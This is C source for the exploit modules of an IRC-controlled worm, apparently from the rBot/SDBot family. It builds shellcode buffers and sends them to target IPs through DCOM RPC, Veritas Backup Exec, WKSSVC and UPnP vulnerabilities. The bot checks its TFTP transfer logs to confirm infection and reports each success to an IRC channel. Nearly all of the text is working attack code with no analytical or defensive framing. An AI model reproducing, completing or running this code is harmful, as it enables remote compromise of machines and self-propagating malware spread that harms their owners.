char *CreateDCOMRequestPacket(EXINFO exinfo, DWORD *RequestPacketSize, int TargetOS, BOOL NamedPipe) { char *pTemp, szSCBuf[4096], szReqBuf[4096], szShellBuf[4096]; int iShellSize = 0, iPos = 0, iSCSize = 0, iReqSize = 0, iNOPSize = sizeof(nops)-1; // get shellcode iShellSize = GetRNS0TerminatedShellcode(szShellBuf, 4096, GetIP(exinfo.sock), filename); if (!iShellSize) return 0; // build a buffer with the shellcode memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1); iPos += sizeof(shellcode_start)-1; memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos += iNOPSize; memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos += iShellSize; iSCSize = iPos; iPos = 0; // prepend NOPs as long as shellcode doesn't fit RPC packet format while ((iSCSize % 16) != 12) { iNOPSize++; memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1); iPos += sizeof(shellcode_start)-1; memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos += iNOPSize; memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos += iShellSize; iSCSize = iPos; iPos = 0; } // set the return address if (NamedPipe) { if (TargetOS == OS_WINXP || TargetOS == OS_UNKNOWN) memcpy(szSCBuf+36, (char *)&call_ebx_offsets[1], 4); else memcpy(szSCBuf+36, (char *)&call_ebx_offsets[0], 4); } else { if (TargetOS == OS_WINXP) memcpy(szSCBuf+36, (char*)&call_ebx_offsets[1], 4); else memcpy(szSCBuf+36, (char*)&call_ebx_offsets[0], 4); } // build the request memcpy(szReqBuf+iPos, request1, sizeof(request1)-1); iPos += sizeof(request1)-1; memcpy(szReqBuf+iPos, request2, sizeof(request2)-1); iPos += sizeof(request2)-1; memcpy(szReqBuf+iPos, szSCBuf, iSCSize ); iPos += iSCSize; memcpy(szReqBuf+iPos, request3, sizeof(request3)-1); iPos += sizeof(request3)-1; memcpy(szReqBuf+iPos, request4, sizeof(request4)-1); iPos += sizeof(request4)-1; iReqSize = iPos; // fill the request with the right sizes pTemp = szReqBuf + (sizeof(request1)-1); *(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iSCSize / 2; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize / 2; pTemp = szReqBuf; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize - 12; *(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iSCSize - 12; *(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iSCSize - 12; *(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iSCSize - 12; *(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iSCSize - 12; *(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iSCSize - 12; *(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iSCSize - 12; *(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iSCSize - 12; char *Shellcode = (char *)malloc(iReqSize+1); memset(Shellcode, 0, iReqSize+1); memcpy(Shellcode, szReqBuf, iReqSize); *RequestPacketSize = iReqSize; return Shellcode; }
BOOL VertiasBackupExec( EXINFO exinfo, VertiasBackupExec_Version eVersion ) { char *pszVerString; // --- int nShellSize; char szShellBuf[ 512 ]; // --- SOCKET nFDSocket; sockaddr_in ServerAddr; // --- int nCounter; // prepare version depending data if( eVersion == Backup_Exec_v9_1_4691_SP1_SP0 ) { memcpy( &talk[ 37 ], &v91sp0sp1, 4 ); memcpy( &talk[ 72 ], &esisp0sp1, 4 ); pszVerString = "v9.1.4691.0+1"; } else if( eVersion == Backup_Exec_v8_5_3572 ) { memcpy( &talk[ 37 ], &v85, 4 ); memcpy( &talk[ 72 ], &esiold, 4 ); pszVerString = "v8.5.3572"; } else return FALSE; // get shellcode nShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename ); if( !nShellSize ) return FALSE; // create socket nFDSocket = fsocket( AF_INET, SOCK_STREAM, IPPROTO_IP ); if( nFDSocket == INVALID_SOCKET ) return FALSE; // connect to it memset( &ServerAddr, 0, sizeof( ServerAddr ) ); ServerAddr.sin_family = AF_INET; ServerAddr.sin_port = fhtons( exinfo.port ); ServerAddr.sin_addr.s_addr = finet_addr( exinfo.ip ); if( fconnect( nFDSocket, (sockaddr*)&ServerAddr, sizeof( ServerAddr ) ) == SOCKET_ERROR ) { fclosesocket( nFDSocket ); return FALSE; } // send talk if( fsend( nFDSocket, talk, sizeof( talk ) - 1, 0 ) == SOCKET_ERROR ) { fclosesocket( nFDSocket ); return FALSE; } Sleep( 10 ); // send payload(s) for( nCounter = 0; nCounter < 7; nCounter++ ) { if( fsend( nFDSocket, szShellBuf, strlen( szShellBuf ), 0 ) == SOCKET_ERROR ) { fclosesocket( nFDSocket ); return FALSE; } Sleep( 10 ); } Sleep( 1000 ); fclosesocket( nFDSocket ); // MESSAGE(S) char buffer[ IRCLINE ]; _snprintf(buffer, sizeof(buffer), "[%s (%s)]: Exploiting IP: %s.", exploit[exinfo.exploit].name, pszVerString, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); exploit[exinfo.exploit].stats++; return TRUE; }
BOOL dcom2(EXINFO exinfo) { char sendbuf[IRCLINE],*pTemp; char szRecvBuf[4096],szLoadBuf[4096],szReqBuf[4096],szShellBuf[4096],szLoaderBuf[4096]; int iShellSize=0,iLoaderSize=0,iPos=0,iSCSize=0,iLoadSize=0,iReqSize=0; int TargetOS = FpHost(exinfo.ip, FP_RPC); if (TargetOS == OS_UNKNOWN || TargetOS == OS_WINNT) return FALSE; // get a funky fresh socket SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP); if (sSocket == SOCKET_ERROR) return FALSE; // fill in sockaddr and resolve the host SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)exinfo.port); ssin.sin_addr.s_addr = finet_addr(exinfo.ip); iShellSize = GetRNS0TerminatedShellcode(szShellBuf, 4096, GetIP(exinfo.sock), filename); if (!iShellSize) return 0; iLoaderSize = EncodeRNS0(szLoaderBuf, 4096, dcom2_loader, sizeof(dcom2_loader)-1); memcpy(szLoadBuf+iPos, dcom2_shellcode_buf, sizeof(dcom2_shellcode_buf) ); iPos+=sizeof(dcom2_shellcode_buf); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szLoaderBuf, iLoaderSize ); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szShellBuf, iShellSize ); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_JMP_ADDR, &dcom2_my_offsets[0].lJmpAddr, 4 ); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_TOP_SEH, &dcom2_my_offsets[0].lTopSEH, 4 ); iLoadSize = iPos; iPos = 0; pTemp = szReqBuf+sizeof(dcom2_request1)-1; // Fill the request with the right sizes *(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iLoadSize / 2; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize / 2; pTemp=szReqBuf; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize - 12; *(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iLoadSize - 12; *(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iLoadSize - 12; *(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iLoadSize - 12; *(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iLoadSize - 12; *(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iLoadSize - 12; *(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iLoadSize - 12; *(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iLoadSize - 12; // connect with target IP int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)); if (iErr==-1) { // connect failed, exit fclosesocket(sSocket); return FALSE; } // send the bind string if (fsend(sSocket, dcom2_bindstr, sizeof(dcom2_bindstr)-1, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } // read reply frecv(sSocket, szRecvBuf, 4096, 0); // Check for DCE_PKT_BINDACK if (szRecvBuf[2] != DCE_PKT_BINDACK) { fclosesocket(sSocket); return FALSE; } // send evil request if (fsend(sSocket, szReqBuf, iReqSize, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } // read reply frecv(sSocket, szRecvBuf, 4096, 0); if (szRecvBuf[2] == DCE_PKT_FAULT) { fclosesocket(sSocket); return FALSE; } fclosesocket(sSocket); sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip); for (int i=0; i < 6; i++) { if (searchlog(sendbuf)) { sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice); addlog(sendbuf); exploit[exinfo.exploit].stats++; break; } Sleep(5000); } return TRUE; }
BOOL ScriptGod_WKSSVC( unsigned long nTargetID, EXINFO exinfo ) { int TargetOS; char szShellBuf[ 512 ]; int iShellSize; // ============================= char* pszTarget; // --- char szNetbiosTarget[ 8192 ]; wchar_t wszNetbiosTarget[ 8192 ]; unsigned char szShellcodeEncoded[ ( sizeof( szShellBuf ) * 2 ) + 1 ]; unsigned char szExploitsData[ 3500 ]; unsigned long nExploitsDataPos; wchar_t wszExploitsData[ sizeof( szExploitsData ) ]; // --- char szIPC[ 8192 ]; NETRESOURCE NetSource; // --- char szPipe[ 8192 ]; HANDLE hPipe; // --- RPC_ReqBind BindPacket; unsigned long nBytesWritten; RPC_ReqNorm ReqNormalHeader; unsigned long nPacketSize; unsigned char* pPacket; unsigned long nPacketPos; // ============================ // check if xp TargetOS = FpHost( exinfo.ip, FP_RPC ); if( TargetOS != OS_WINXP ) return FALSE; // parameters pszTarget = exinfo.ip; // get shellcode iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename ); if( !iShellSize ) return FALSE; // generate exploits buffer // ======================== memset( szShellcodeEncoded, 0, sizeof( szShellcodeEncoded ) ); memset( szExploitsData, 0, sizeof( szExploitsData ) ); memset( wszExploitsData, 0, sizeof( wszExploitsData ) ); // fill with NOPs (using inc ecx instead of NOP, 0-terminated-string) memset( szExploitsData, 'A', sizeof( szExploitsData ) - 1 ); // new EIP *(unsigned long*)( &szExploitsData[ Targets[ nTargetID ].nNewEIP_BufferOffset ] ) = Targets[ nTargetID ].nNewEIP; // some NOPs nExploitsDataPos = 2300; // add stack memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 ); nExploitsDataPos += sizeof( szStack ) - 1; // add decoder memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 ); nExploitsDataPos += sizeof( szDecoder ) - 1; // add shellcode // - bind port // - encode Encode( (unsigned char*)szShellBuf, iShellSize, szShellcodeEncoded ); // - add memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) ); nExploitsDataPos += strlen( (char*)szShellcodeEncoded ); // - 0 terminaten for decoder szExploitsData[ nExploitsDataPos ] = 0; nExploitsDataPos += 1; // convert to UNICODE // ================== for( int n = 0; n < sizeof( szExploitsData ); n++ ) wszExploitsData[ n ] = szExploitsData[ n ]; //MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) ); snprintf( szNetbiosTarget, sizeof( szNetbiosTarget ), "\\\\%s", pszTarget ); mbstowcs( wszNetbiosTarget, szNetbiosTarget, sizeof( wszNetbiosTarget ) / sizeof( wchar_t ) ); // create NULL session // =================== if( strcmpi( pszTarget, "." ) ) { snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", pszTarget ); memset( &NetSource, 0 ,sizeof( NetSource ) ); NetSource.lpRemoteName = szIPC; fWNetAddConnection2( &NetSource, "", "", 0 ); } // =================== // connect to pipe // =============== snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\wkssvc", pszTarget ); hPipe = CreateFile( szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL ); if( hPipe == INVALID_HANDLE_VALUE ) { fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); return FALSE; } // =============== // bind packet // =========== memset( &BindPacket, 0, sizeof( BindPacket ) ); BindPacket.NormalHeader.versionmaj = 5; BindPacket.NormalHeader.versionmin = 0; BindPacket.NormalHeader.type = 11; // bind BindPacket.NormalHeader.flags = 3; // first + last fragment BindPacket.NormalHeader.representation = 0x00000010; // little endian BindPacket.NormalHeader.fraglength = sizeof( BindPacket ); BindPacket.NormalHeader.authlength = 0; BindPacket.NormalHeader.callid = 1; BindPacket.maxtsize = 4280; BindPacket.maxrsize = 4280; BindPacket.assocgid = 0; BindPacket.numelements = 1; BindPacket.contextid = 0; BindPacket.numsyntaxes = 1; BindPacket.Interface1.version = 1; memcpy( BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16 ); BindPacket.Interface2.version = 2; memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 ); // send if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) ) { CloseHandle( hPipe ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); return FALSE; } // =========== // request // ======= // generate packet // --------------- // calc packet size nPacketSize = 0; nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1; nPacketSize += sizeof( UNISTR2 ); nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t ); while( nPacketSize % 4 ) nPacketSize++; if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1; nPacketSize += sizeof( UNISTR2 ); nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t ); while( nPacketSize % 4 ) nPacketSize++; nPacketSize += 8; // szWSSKVCUnknown3 if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) nPacketSize += 4; // NetAddAlternateComputerName = reserved else nPacketSize += 2; // NetValidateName = NameType // alloc packet pPacket = (unsigned char*)malloc( nPacketSize ); if( !pPacket ) { CloseHandle( hPipe ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); return FALSE; } memset( pPacket, 0, nPacketSize ); // build packet nPacketPos = 0; // - szWKSSVCUnknown1 memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 ); nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1; // - wszNetbiosTarget ( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszNetbiosTarget ) + 1; ( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0; ( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length; nPacketPos += sizeof( UNISTR2 ); wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget ); nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t ); // - align while( nPacketPos % 4 ) nPacketPos++; // - szWKSSVCUnknown2 if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) { memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 ); nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1; } // - wszExploitsData ( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszExploitsData ) + 1; ( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0; ( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length; nPacketPos += sizeof( UNISTR2 ); wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData ); nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t ); // - align while( nPacketPos % 4 ) nPacketPos++; // - szWSSKVCUnknown3 (only eigth 0x00s) memset( &pPacket[ nPacketPos ], 0, 8 ); nPacketPos += 8; if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) { // NetAddAlternateComputerName = 0 *(DWORD*)&pPacket[ nPacketPos ] = 0; nPacketPos += sizeof( DWORD ); } else { // NetValidateName = NetSetupMachine *(unsigned short*)&pPacket[ nPacketPos ] = 1; nPacketPos += 2; } // header memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) ); ReqNormalHeader.NormalHeader.versionmaj = 5; ReqNormalHeader.NormalHeader.versionmin = 0; ReqNormalHeader.NormalHeader.type = 0; // request ReqNormalHeader.NormalHeader.flags = 3; // first + last fragment ReqNormalHeader.NormalHeader.representation = 0x00000010; // little endian ReqNormalHeader.NormalHeader.authlength = 0; ReqNormalHeader.NormalHeader.callid = 1; ReqNormalHeader.prescontext = 0; if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) ReqNormalHeader.opnum = 27; // NetrAddAlternateComputerName else ReqNormalHeader.opnum = 25; // NetrValidateName2 // send if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) ) { CloseHandle( hPipe ); free( pPacket ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); return FALSE; } // ======= // clean up // =================; CloseHandle( hPipe ); free( pPacket ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); char buffer[ IRCLINE ]; //_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); exploit[exinfo.exploit].stats++; return TRUE; }
BOOL upnp(EXINFO exinfo) { char sendbuf[IRCLINE],szRequest[2048],szJmpCode[281],szExeCode[840]; int i; for(i = 0; i < 268; i++) szJmpCode[i] = (char)0x43; szJmpCode[268]=(char)0x4D; szJmpCode[269]=(char)0x3F; szJmpCode[270]=(char)0xE3; szJmpCode[271]=(char)0x77; szJmpCode[272]=(char)0x90; szJmpCode[273]=(char)0x90; szJmpCode[274]=(char)0x90; szJmpCode[275]=(char)0x90; //jmp [ebx+0x64], jump to execute shellcode szJmpCode[276]=(char)0xFF; szJmpCode[277]=(char)0x63; szJmpCode[278]=(char)0x64; szJmpCode[279]=(char)0x90; szJmpCode[280]=(char)0x00; for(i = 0; i < 32; i++) szExeCode[i] = (char)0x43; szExeCode[32] = (char)0x00; char *sc = (char *)malloc(4096); DWORD scsize = GetRNS0TerminatedShellcode(sc, 4096, GetIP(exinfo.sock), filename); if (!scsize) { free(sc); return FALSE; } strcat(szExeCode, sc); sprintf(szRequest, "%s%s\r\n\r\n", szJmpCode, szExeCode); SOCKET sSock = fsocket(AF_INET, SOCK_STREAM, 0); if (sSock == SOCKET_ERROR) { free(sc); return FALSE; } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons(exinfo.port); ssin.sin_addr.s_addr = finet_addr(exinfo.ip); memset(ssin.sin_zero, 0, 8); if (fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN)) == SOCKET_ERROR) { // Connect failed, exit free(sc); fclosesocket(sSock); return FALSE; } if (fsend(sSock, szRequest, strlen(szRequest)+1,0) == SOCKET_ERROR) { free(sc); fclosesocket(sSock); return FALSE; } free(sc); fclosesocket(sSock); Sleep(1000); sprintf(sendbuf,"[TFTPD]: File transfer started to IP: %s", exinfo.ip); if (searchlog(sendbuf, TRUE)) { sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice); addlog(sendbuf); exploit[exinfo.exploit].stats++; } return TRUE; }